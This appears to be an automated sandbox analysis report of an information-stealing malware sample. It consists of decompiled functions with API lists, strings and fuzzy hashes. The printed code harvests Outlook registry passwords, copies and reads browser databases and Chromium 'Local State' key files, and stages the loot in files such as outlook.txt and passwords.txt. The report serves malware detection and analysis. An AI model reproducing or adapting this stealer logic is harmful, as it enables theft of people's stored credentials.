Part of subcall function 00424D00: _memset.LIBCMT ref: 00424D49
Part of subcall function 00424D00: _memset.LIBCMT ref: 00424D5F
Part of subcall function 00424D00: lstrcat.KERNEL32(?,00424F3F), ref: 00424D72
Part of subcall function 00424D00: lstrcat.KERNEL32(?,passwords.txt), ref: 00424D84
Part of subcall function 00424D00: lstrcat.KERNEL32(?,C:\\ProgramData\\734573140483756), ref: 00424D96
Part of subcall function 00424D00: lstrcat.KERNEL32(?,00C176D8), ref: 00424DAA
Part of subcall function 00424D00: lstrcat.KERNEL32(?,00424EE3), ref: 00424DBB
Part of subcall function 00424D00: lstrcat.KERNEL32(?,passwords.txt), ref: 00424DCD
Part of subcall function 00424D00: CopyFileA.KERNEL32(?,?,00000001), ref: 00424DE3
Part of subcall function 00424D00: __findnext64i32.LIBCMT ref: 00424DF2

Strings

C:\\ProgramData\\734573140483756, xrefs: 00424E81

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$Directory$CopyCreateCurrentFileFolderPath__findfirst64i32__findnext64i32
String ID: C:\\ProgramData\\734573140483756
API String ID: 1500432195-3356951166
Opcode ID: f4b3a7596f8fdaf2e76ed6f01339550422c745ecdc72c7ec85b9adf5198f2bbc
Instruction ID: ea5f56cdc59ae128c86347322f49a49318d30f91748238401bf9afd0c7f447a2
Opcode Fuzzy Hash: f4b3a7596f8fdaf2e76ed6f01339550422c745ecdc72c7ec85b9adf5198f2bbc
Instruction Fuzzy Hash: E121EBB2A4011CABCB18EF90DD86FDA7378AB5C304F044699B705571C1DB749A84CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF60, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0041EF60(void* __ebx, long* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a8, char* _a12) {
				long _v8;
				char _v16;
				void* _v20;
				char _v36;
				signed int _v40;
				char _v1064;
				int _v1068;
				char _v2096;
				int _v2100;
				char _v3128;
				int _v3132;
				int _v3136;
				char _v3144;
				int _v3148;
				char _v3176;
				char _v3204;
				char _v3208;
				signed int _v3212;
				long* _v3216;
				signed int _t78;
				signed int _t79;
				long _t83;
				intOrPtr _t87;
				void* _t106;
				void* _t118;
				void* _t160;
				void* _t161;
				signed int _t162;
				void* _t163;
				void* _t164;
				void* _t165;

				_t161 = __esi;
				_t160 = __edi;
				_t118 = __ebx;
				_push(0xffffffff);
				_push(E0042662F);
				_push( *[fs:0x0]);
				_t164 = _t163 - 0xc80;
				_t78 =  *0x4301f4; // 0x3b2bc12f
				_t79 = _t78 ^ _t162;
				_v40 = _t79;
				_push(_t79);
				 *[fs:0x0] =  &_v16;
				_v3216 = __ecx;
				_v3212 = 0;
				E00402DD0( &_v36);
				_v8 = 0;
				 *_v3216 = 0;
				_v20 = 0;
				_t149 = _a12;
				_t83 = RegOpenKeyExA(0x80000001, _a12, 0, 0x20019,  &_a8); // executed
				if(_t83 != 0) {
					E00402E00(_a4,  &_v36);
					_v3212 = _v3212 | 0x00000001;
					_v8 = 0xffffffff;
					E00402E80( &_v36);
					_t87 = _a4;
					goto L15;
				} else {
					_v3136 = 0;
					_v3132 = 0xff;
					_v1068 = 3;
					_v2096 = 0;
					while(RegEnumValueA(_a8, _v3136,  &_v2096,  &_v3132, 0,  &_v1068,  &_v1064,  &_v2100) == 0) {
						E00402D70( &_v3208);
						_v8 = 1;
						E00401EA0( &_v3204,  &_v2096);
						_v3208 = _v1068;
						_v3148 = _v2100;
						if(_v1068 != 3) {
							if(_v1068 != 1) {
								if(_v1068 == 4) {
									_v3144 = _v1064;
								}
							} else {
								E00401EA0( &_v3176,  &_v1064);
							}
						} else {
							_t106 = E00402D10( &_v2096, "Password");
							_t165 = _t164 + 8;
							if(_t106 == 0) {
								E004038E0( &_v1064,  &_v1064, "%S",  &_v1064);
								_t164 = _t165 + 0xc;
								E00401EA0( &_v3176,  &_v1064);
							} else {
								_v20 = E0041EED0( &_v1064, _v2100);
								E004038C0( &_v3128, _v20);
								HeapFree(GetProcessHeap(), 0, _v20);
								E00401EA0( &_v3176,  &_v3128);
								E004038C0( &_v3128, 0x429491);
								_t164 = _t165 + 0x18;
							}
						}
						 *_v3216 =  *_v3216 + 1;
						E00402EC0( &_v36,  &_v3208);
						_v3132 = 0x400;
						_v2100 = 0x400;
						_v3136 = _v3136 + 1;
						_v8 = 0;
						E00402DA0( &_v3208);
					}
					E00402E00(_a4,  &_v36);
					_t149 = _v3212 | 0x00000001;
					_v3212 = _v3212 | 0x00000001;
					_v8 = 0xffffffff;
					E00402E80( &_v36);
					_t87 = _a4;
					L15:
					 *[fs:0x0] = _v16;
					return E00404354(_t87, _t118, _v40 ^ _t162, _t149, _t160, _t161);
				}
			}

0x0041ef60
0x0041ef60
0x0041ef60
0x0041ef63
0x0041ef65
0x0041ef70
0x0041ef71
0x0041ef77
0x0041ef7c
0x0041ef7e
0x0041ef81
0x0041ef85
0x0041ef8b
0x0041ef91
0x0041ef9e
0x0041efa3
0x0041efb0
0x0041efb6
0x0041efc8
0x0041efd1
0x0041efd9
0x0041f1f7
0x0041f205
0x0041f20b
0x0041f215
0x0041f21a
0x00000000
0x0041efdf
0x0041efdf
0x0041efe9
0x0041eff3
0x0041effd
0x0041f004
0x0041f048
0x0041f04d
0x0041f05e
0x0041f069
0x0041f075
0x0041f082
0x0041f13d
0x0041f15a
0x0041f162
0x0041f162
0x0041f13f
0x0041f14c
0x0041f14c
0x0041f088
0x0041f094
0x0041f099
0x0041f09e
0x0041f11a
0x0041f11f
0x0041f12f
0x0041f0a0
0x0041f0b6
0x0041f0c4
0x0041f0d9
0x0041f0ec
0x0041f0fd
0x0041f102
0x0041f102
0x0041f134
0x0041f179
0x0041f185
0x0041f18a
0x0041f194
0x0041f1a7
0x0041f1ad
0x0041f1b7
0x0041f1b7
0x0041f1c8
0x0041f1d3
0x0041f1d6
0x0041f1dc
0x0041f1e6
0x0041f1eb
0x0041f21d
0x0041f220
0x0041f235
0x0041f235

APIs

RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0041EFD1
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 0041F034
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041F0D2
HeapFree.KERNEL32(00000000), ref: 0041F0D9

Part of subcall function 004038E0: _vswprintf_s.LIBCMT ref: 004038FB

task.LIBCPMTD ref: 0041F1E6
task.LIBCPMTD ref: 0041F215

Strings

Password, xrefs: 0041F088

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heaptask$EnumFreeOpenProcessValue_vswprintf_s
String ID: Password
API String ID: 541219633-3434357891
Opcode ID: 457a01965bc8a16e7e646d1f490dd91e8be1590f6004a9f66447c92fd646dc42
Instruction ID: 7ef44c43e58b29f017847e03fa3b9e536e5a51fabef7b537324a8127fa539a65
Opcode Fuzzy Hash: 457a01965bc8a16e7e646d1f490dd91e8be1590f6004a9f66447c92fd646dc42
Instruction Fuzzy Hash: E9712BB19102189BDB24DF54CD91FDEB7B4BB48314F5082AAE50967281DF786F88CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0041F240, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041F240(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v32;
				intOrPtr _v36;
				void* __ebp;
				intOrPtr _t26;
				void* _t61;
				void* _t62;

				_t60 = __esi;
				_t59 = __edi;
				_t42 = __ebx;
				E0041EF60(__ebx,  &_v32, __edi, __esi,  &_v28, 0x80000001, _a4); // executed
				_t26 = E004055AB("outlook.txt", "a+"); // executed
				_t62 = _t61 + 8;
				_v12 = _t26;
				_v8 = _v32;
				_t65 = _v8;
				if(_v8 > 0) {
					_push("\n");
					_push(_v12);
					E004055C2(__ebx, __edi, __esi, _t65);
					_t62 = _t62 + 8;
					_v36 = 0;
					while(1) {
						_t66 = _v36 - _v8;
						if(_v36 >= _v8) {
							goto L7;
						}
						_push(E00401330(E00402EA0( &_v28, _v36) + 4));
						_push("%s: ");
						_push(_v12);
						E004055C2(_t42, _t59, _t60, _t66);
						_t62 = _t62 + 0xc;
						if( *((intOrPtr*)(E00402EA0( &_v28, _v36))) != 4) {
							_push(E00401330(E00402EA0( &_v28, _v36) + 0x20));
							_push("%s\n");
							_push(_v12);
							E004055C2(_t42, _t59, _t60, E00402EA0( &_v28, _v36) + 0x20);
							_t62 = _t62 + 0xc;
						}
						_v36 = _v36 + 1;
					}
				}
				L7:
				_push(_v12);
				E00405EA3(_t42, _v12, _t59, _t60, __eflags);
				return E00402E80( &_v28);
			}

0x0041f240
0x0041f240
0x0041f240
0x0041f256
0x0041f265
0x0041f26a
0x0041f26d
0x0041f273
0x0041f276
0x0041f27a
0x0041f280
0x0041f288
0x0041f289
0x0041f28e
0x0041f291
0x0041f2a3
0x0041f2a6
0x0041f2a9
0x00000000
0x00000000
0x0041f2c1
0x0041f2c2
0x0041f2ca
0x0041f2cb
0x0041f2d0
0x0041f2e2
0x0041f2fa
0x0041f2fb
0x0041f303
0x0041f304
0x0041f309
0x0041f309
0x0041f2a0
0x0041f2a0
0x0041f2a3
0x0041f30e
0x0041f311
0x0041f312
0x0041f325

APIs

Part of subcall function 0041EF60: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0041EFD1
Part of subcall function 0041EF60: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 0041F034
Part of subcall function 0041EF60: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041F0D2
Part of subcall function 0041EF60: HeapFree.KERNEL32(00000000), ref: 0041F0D9

Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8

_fprintf.LIBCMT ref: 0041F289
_fprintf.LIBCMT ref: 0041F2CB

Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7

_fprintf.LIBCMT ref: 0041F304
task.LIBCPMTD ref: 0041F31D

Strings

%s: , xrefs: 0041F2C2
%s, xrefs: 0041F2FB
outlook.txt, xrefs: 0041F260

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$Heap$EnumFreeOpenProcessValue__fsopen__ftbuf__lock_file__output_l__stbuftask
String ID: %s$%s: $outlook.txt
API String ID: 1568629617-832069077
Opcode ID: 173c371cda97e8d7d48480c82e11604cce746cfe3e80d4a81e8dfd7928785786
Instruction ID: 555e29c1499d1913ce3ba631964d1994d4a3664e14a7d307d03251650a9181d7
Opcode Fuzzy Hash: 173c371cda97e8d7d48480c82e11604cce746cfe3e80d4a81e8dfd7928785786
Instruction Fuzzy Hash: 30215EB5E10218ABDF04EBE1DC42AEE7775EB58304F50412FE90577281DA3CA985CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA80, Relevance: 12.2, APIs: 8, Instructions: 157
filestringCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0041DA80(void* __ebx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v316;
				char _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				void* __ebp;
				signed int _t44;
				void* _t56;
				int _t58;
				void* _t61;
				intOrPtr _t64;
				void* _t66;
				void* _t74;
				intOrPtr _t79;
				void* _t83;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr _t92;
				CHAR* _t102;
				void* _t110;
				void* _t111;
				signed int _t112;
				void* _t113;
				void* _t116;
				void* _t117;
				void* _t120;

				_t111 = __esi;
				_t110 = __edi;
				_t83 = __ebx;
				_t44 =  *0x4301f4; // 0x3b2bc12f
				_v8 = _t44 ^ _t112;
				GetCurrentDirectoryA(0x104,  &_v580);
				_t84 =  *0x432400; // 0xc16718
				 *0x4328c4( &_v580, _t84);
				CopyFileA(_a4,  &_v580, 1); // executed
				E004091C0( &_v316, 0, 0x104);
				_t102 =  *0x4323e8; // 0xc16a10
				wsprintfA( &_v316, _t102, _a12, _a8);
				_t87 =  *0x4320b8; // 0xc16f68
				_v44 = _t87;
				_t103 =  &_v40;
				_t56 =  *0x432750( &_v580,  &_v40); // executed
				_t116 = _t113 + 0x24;
				if(_t56 == 0) {
					_t61 =  *0x432700(_v40, _v44, 0xffffffff,  &_v48, 0); // executed
					_t117 = _t116 + 0x14;
					if(_t61 == 0) {
						_t92 =  *0x4321d0; // 0xc110d8
						_t105 =  &_v316;
						_t64 = E004055AB( &_v316, _t92); // executed
						_t117 = _t117 + 8;
						_v584 = _t64;
						if(_v584 != 0) {
							while(1) {
								_t66 =  *0x432720(_v48); // executed
								_t120 = _t117 + 4;
								_t131 = _t66 - 0x64;
								if(_t66 != 0x64) {
									break;
								}
								_v592 =  *0x43273c(_v48, 0);
								_v588 =  *0x43273c(_v48, 1);
								_v596 =  *0x43273c(_v48, 2);
								_t74 =  *0x43272c(_v48, 3, _a16, _a20);
								_v600 = E0041D730(_t83,  &_v36,  *0x432734(), _v48, 3, _t74);
								_push(_v596);
								_push(_v588);
								_push(_v592);
								_push(E00401330(_v600));
								_t79 =  *0x432138; // 0xc16068
								_push(_t79);
								_push(_v584);
								E004055C2(_t83, _t110, _t111, _t131);
								E004012D0( &_v36);
								_push("\n\n");
								_t105 = _v584;
								_push(_v584);
								E004055C2(_t83, _t110, _t111, _t131);
								_t117 = _t120 + 0x5c;
							}
							_push(_v584);
							E00405EA3(_t83, _t105, _t110, _t111, __eflags);
							_t117 = _t120 + 4;
						}
					}
					 *0x432724(_v48);
					_t103 = _v40;
					 *0x432754(_v40);
				}
				_t58 = DeleteFileA( &_v580); // executed
				__eflags = _v8 ^ _t112;
				return E00404354(_t58, _t83, _v8 ^ _t112, _t103, _t110, _t111);
			}

0x0041da80
0x0041da80
0x0041da80
0x0041da89
0x0041da90
0x0041da9f
0x0041daa5
0x0041dab3
0x0041dac6
0x0041dada
0x0041daea
0x0041daf8
0x0041db01
0x0041db07
0x0041db0a
0x0041db15
0x0041db1b
0x0041db20
0x0041db36
0x0041db3c
0x0041db41
0x0041db47
0x0041db4e
0x0041db55
0x0041db5a
0x0041db5d
0x0041db6a
0x0041db70
0x0041db74
0x0041db7a
0x0041db7d
0x0041db80
0x00000000
0x00000000
0x0041db95
0x0041dbaa
0x0041dbbf
0x0041dbd3
0x0041dbf9
0x0041dc05
0x0041dc0c
0x0041dc13
0x0041dc1f
0x0041dc20
0x0041dc25
0x0041dc2c
0x0041dc2d
0x0041dc38
0x0041dc3d
0x0041dc42
0x0041dc48
0x0041dc49
0x0041dc4e
0x0041dc4e
0x0041dc5c
0x0041dc5d
0x0041dc62
0x0041dc62
0x0041db6a
0x0041dc69
0x0041dc72
0x0041dc76
0x0041dc7c
0x0041dc86
0x0041dc8f
0x0041dc99

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041DA9F
lstrcat.KERNEL32(?,00C16718), ref: 0041DAB3
CopyFileA.KERNEL32(?,?,00000001), ref: 0041DAC6
_memset.LIBCMT ref: 0041DADA
wsprintfA.USER32 ref: 0041DAF8
DeleteFileA.KERNEL32(?), ref: 0041DC86

Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8

Part of subcall function 0041D730: _memset.LIBCMT ref: 0041D7A4
Part of subcall function 0041D730: LocalAlloc.KERNEL32(00000040,?), ref: 0041D7F3

_fprintf.LIBCMT ref: 0041DC2D
_fprintf.LIBCMT ref: 0041DC49

Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File_fprintf_memset$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuflstrcatwsprintf
String ID:
API String ID: 1106594688-0
Opcode ID: 0df1f39b027009ee0bfd2bba978dc354717e4cc43626b7785597751fa8d3c681
Instruction ID: b7e754361677a1f3ef2fd7e3f9e65c1c63799f8599065462e7f6851c09d7b54f
Opcode Fuzzy Hash: 0df1f39b027009ee0bfd2bba978dc354717e4cc43626b7785597751fa8d3c681
Instruction Fuzzy Hash: A35184B1D00204ABCB14EFA4DD89FDE7378FB48305F0445A9F609A7290D775AA84CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B7B0, Relevance: 12.1, APIs: 8, Instructions: 121
filestringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E0041B7B0(void* __ebx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v284;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				void* __ebp;
				signed int _t31;
				void* _t43;
				int _t44;
				void* _t47;
				intOrPtr _t51;
				void* _t53;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr _t73;
				CHAR* _t76;
				void* _t81;
				void* _t82;
				signed int _t83;
				void* _t84;
				void* _t87;
				void* _t88;
				void* _t91;

				_t82 = __esi;
				_t81 = __edi;
				_t61 = __ebx;
				_t31 =  *0x4301f4; // 0x3b2bc12f
				_v20 = _t31 ^ _t83;
				GetCurrentDirectoryA(0x104,  &_v548);
				_t62 =  *0x432400; // 0xc16718
				 *0x4328c4( &_v548, _t62);
				CopyFileA(_a4,  &_v548, 1); // executed
				E004091C0( &_v284, 0, 0x104);
				_t76 =  *0x4321a8; // 0xc16410
				wsprintfA( &_v284, _t76, _a12, _a8);
				_t65 =  *0x4325f0; // 0xc16e08
				_v12 = _t65;
				_t77 =  &_v8;
				_t43 =  *0x432750( &_v548,  &_v8); // executed
				_t87 = _t84 + 0x24;
				if(_t43 == 0) {
					_t47 =  *0x432700(_v8, _v12, 0xffffffff,  &_v16, 0); // executed
					_t88 = _t87 + 0x14;
					if(_t47 == 0) {
						_t70 =  *0x4321d0; // 0xc110d8
						_t79 =  &_v284;
						_t51 = E004055AB( &_v284, _t70); // executed
						_t88 = _t88 + 8;
						_v552 = _t51;
						if(_v552 != 0) {
							while(1) {
								_t53 =  *0x432720(_v16);
								_t91 = _t88 + 4;
								_t98 = _t53 - 0x64;
								if(_t53 != 0x64) {
									break;
								}
								_v556 =  *0x43273c(_v16, 0);
								_push( *0x43273c(_v16, 1));
								_push(_v556);
								_t73 =  *0x4324f8; // 0xc16838
								_push(_t73);
								_t79 = _v552;
								_push(_v552);
								E004055C2(_t61, _t81, _t82, _t98);
								_push("\n");
								_push(_v552);
								E004055C2(_t61, _t81, _t82, _t98);
								_t88 = _t91 + 0x28;
							}
							_push(_v552);
							E00405EA3(_t61, _t79, _t81, _t82, __eflags);
							_t88 = _t91 + 4;
						}
					}
					_t77 = _v16;
					 *0x432724(_v16);
					 *0x432754(_v8);
				}
				_t44 = DeleteFileA( &_v548); // executed
				__eflags = _v20 ^ _t83;
				return E00404354(_t44, _t61, _v20 ^ _t83, _t77, _t81, _t82);
			}

0x0041b7b0
0x0041b7b0
0x0041b7b0
0x0041b7b9
0x0041b7c0
0x0041b7cf
0x0041b7d5
0x0041b7e3
0x0041b7f6
0x0041b80a
0x0041b81a
0x0041b828
0x0041b831
0x0041b837
0x0041b83a
0x0041b845
0x0041b84b
0x0041b850
0x0041b866
0x0041b86c
0x0041b871
0x0041b877
0x0041b87e
0x0041b885
0x0041b88a
0x0041b88d
0x0041b89a
0x0041b89c
0x0041b8a0
0x0041b8a6
0x0041b8a9
0x0041b8ac
0x00000000
0x00000000
0x0041b8bd
0x0041b8d2
0x0041b8d9
0x0041b8da
0x0041b8e0
0x0041b8e1
0x0041b8e7
0x0041b8e8
0x0041b8f0
0x0041b8fb
0x0041b8fc
0x0041b901
0x0041b901
0x0041b90c
0x0041b90d
0x0041b912
0x0041b912
0x0041b89a
0x0041b915
0x0041b919
0x0041b926
0x0041b92c
0x0041b936
0x0041b93f
0x0041b949

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041B7CF
lstrcat.KERNEL32(?,00C16718), ref: 0041B7E3
CopyFileA.KERNEL32(?,?,00000001), ref: 0041B7F6
_memset.LIBCMT ref: 0041B80A
wsprintfA.USER32 ref: 0041B828
DeleteFileA.KERNEL32(?), ref: 0041B936

Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8

_fprintf.LIBCMT ref: 0041B8E8
_fprintf.LIBCMT ref: 0041B8FC

Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcatwsprintf
String ID:
API String ID: 556801341-0
Opcode ID: 31ee0b0fae2133c2ba39f27a9a6c802c3e5941c70c0fd2532d29284dcd6748d0
Instruction ID: e8761a1d6595843f783b96905d13a4169cfc93f9c27205834795f2e7f4044694
Opcode Fuzzy Hash: 31ee0b0fae2133c2ba39f27a9a6c802c3e5941c70c0fd2532d29284dcd6748d0
Instruction Fuzzy Hash: 484172B5D00208BBCB14EFA4ED89EEE7378FB48304F0445A9F60697281D775AA54CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041E990, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041E990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v284;
				char _v548;
				signed int _t25;
				void* _t36;
				void* _t43;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t65;
				void* _t69;

				_t63 = __esi;
				_t62 = __edi;
				_t46 = __ebx;
				_t25 =  *0x4301f4; // 0x3b2bc12f
				_v16 = _t25 ^ _t64;
				_v12 = 0;
				_v8 = 0;
				E004091C0( &_v284, 0, 0x104);
				E0041A380( &_v284, 0x1a); // executed
				 *0x4328c4( &_v284, _a4);
				E004091C0( &_v548, 0, 0x104);
				 *0x4328c4( &_v548,  &_v284);
				 *0x4328c4( &_v548, "\\Local State");
				_t36 = E0041A6E0( &_v548); // executed
				_t69 = _t65 + 0x24;
				if(_t36 != 0) {
					_t43 = E0041D900(__ebx,  &_v548,  &_v12,  &_v8);
					_t69 = _t69 + 0xc;
					if(_t43 == 0) {
						E0041CAC0( &_v12,  &_v8);
						_t69 = _t69 + 8;
					}
				}
				E0041E640(_t46, _t62, _t63, 0x429447,  &_v284, _a8, _v12, _v8); // executed
				return E00404354(E0041CAC0( &_v12,  &_v8), _t46, _v16 ^ _t64,  &_v284, _t62, _t63);
			}

0x0041e990
0x0041e990
0x0041e990
0x0041e999
0x0041e9a0
0x0041e9a3
0x0041e9aa
0x0041e9bf
0x0041e9d0
0x0041e9e3
0x0041e9f7
0x0041ea0d
0x0041ea1f
0x0041ea2c
0x0041ea31
0x0041ea36
0x0041ea47
0x0041ea4c
0x0041ea51
0x0041ea5b
0x0041ea60
0x0041ea60
0x0041ea51
0x0041ea7b
0x0041eaa0

APIs

_memset.LIBCMT ref: 0041E9BF

Part of subcall function 0041A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0041A39D

lstrcat.KERNEL32(?,00000000), ref: 0041E9E3
_memset.LIBCMT ref: 0041E9F7
lstrcat.KERNEL32(?,?), ref: 0041EA0D
lstrcat.KERNEL32(?,\Local State), ref: 0041EA1F

Part of subcall function 0041A6E0: GetFileAttributesA.KERNEL32(?), ref: 0041A6EA

Strings

\Local State, xrefs: 0041EA13

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$AttributesFileFolderPath
String ID: \Local State
API String ID: 3917447719-679424310
Opcode ID: 2f3b5c659c8d8e5d695adeaf8c097039d676b0f913797c5650b6d42f32c8d7ed
Instruction ID: aabe7e0d757943bf1a559953441f035433ab2aea8e542140c35c9f68380cff5b
Opcode Fuzzy Hash: 2f3b5c659c8d8e5d695adeaf8c097039d676b0f913797c5650b6d42f32c8d7ed
Instruction Fuzzy Hash: 303178F6D0010CBBCB14EBD1EC86FDE7378AF58304F444199B605A6182EA749788CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041EAB0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041EAB0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v284;
				char _v548;
				signed int _t25;
				void* _t36;
				void* _t43;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t65;
				void* _t69;

				_t63 = __esi;
				_t62 = __edi;
				_t46 = __ebx;
				_t25 =  *0x4301f4; // 0x3b2bc12f
				_v16 = _t25 ^ _t64;
				_v12 = 0;
				_v8 = 0;
				E004091C0( &_v284, 0, 0x104);
				E0041A380( &_v284, 0x1c); // executed
				 *0x4328c4( &_v284, _a4);
				E004091C0( &_v548, 0, 0x104);
				 *0x4328c4( &_v548,  &_v284);
				 *0x4328c4( &_v548, "\\Local State");
				_t36 = E0041A6E0( &_v548); // executed
				_t69 = _t65 + 0x24;
				if(_t36 != 0) {
					_t43 = E0041D900(__ebx,  &_v548,  &_v12,  &_v8); // executed
					_t69 = _t69 + 0xc;
					if(_t43 == 0) {
						E0041CAC0( &_v12,  &_v8);
						_t69 = _t69 + 8;
					}
				}
				E0041E640(_t46, _t62, _t63, 0x429446,  &_v284, _a8, _v12, _v8); // executed
				return E00404354(E0041CAC0( &_v12,  &_v8), _t46, _v16 ^ _t64,  &_v284, _t62, _t63);
			}

0x0041eab0
0x0041eab0
0x0041eab0
0x0041eab9
0x0041eac0
0x0041eac3
0x0041eaca
0x0041eadf
0x0041eaf0
0x0041eb03
0x0041eb17
0x0041eb2d
0x0041eb3f
0x0041eb4c
0x0041eb51
0x0041eb56
0x0041eb67
0x0041eb6c
0x0041eb71
0x0041eb7b
0x0041eb80
0x0041eb80
0x0041eb71
0x0041eb9b
0x0041ebc0

APIs

_memset.LIBCMT ref: 0041EADF

Part of subcall function 0041A380: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0041A39D

lstrcat.KERNEL32(?,00000000), ref: 0041EB03
_memset.LIBCMT ref: 0041EB17
lstrcat.KERNEL32(?,?), ref: 0041EB2D
lstrcat.KERNEL32(?,\Local State), ref: 0041EB3F

Part of subcall function 0041A6E0: GetFileAttributesA.KERNEL32(?), ref: 0041A6EA

Strings

\Local State, xrefs: 0041EB33

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$AttributesFileFolderPath
String ID: \Local State
API String ID: 3917447719-679424310
Opcode ID: c11a84685851c92bee2c3b0c255c9cf4a8c42ae4e8215d334a8c5c3288112bdf
Instruction ID: b0ab83bab44515073897f62d2fa019738ac76b2c10f22035d5c686078b2382ec
Opcode Fuzzy Hash: c11a84685851c92bee2c3b0c255c9cf4a8c42ae4e8215d334a8c5c3288112bdf
Instruction Fuzzy Hash: 393178F6D4010CBBCB14EBD1EC86FDE7378AB58304F444199B60566182EA749788CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD33, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041AD33() {
				void* _t53;
				long _t56;
				long _t60;
				long _t62;
				long _t69;
				void* _t78;
				char* _t87;
				char* _t94;
				void* _t107;
				void* _t108;
				signed int _t109;

				L0:
				while(1) {
					L0:
					 *(_t109 - 0x31960) =  *(_t109 - 0x31960) + 1;
					if( *(_t109 - 0x814) != 0) {
						break;
					}
					L2:
					 *(_t109 - 0x818) = 0x400;
					_t56 = RegEnumKeyExA( *(_t109 - 0x810),  *(_t109 - 0x31960), _t109 - 0x408, _t109 - 0x818, 0, 0, 0, 0); // executed
					 *(_t109 - 0x814) = _t56;
					if( *(_t109 - 0x814) != 0) {
						L13:
						continue;
					} else {
						L3:
						wsprintfA(_t109 - 0x808, "%s\\%s",  *((intOrPtr*)(_t109 - 0x3195c)), _t109 - 0x408);
						_t60 = RegOpenKeyExA(0x80000002, _t109 - 0x808, 0, 0x20019, _t109 - 0x80c); // executed
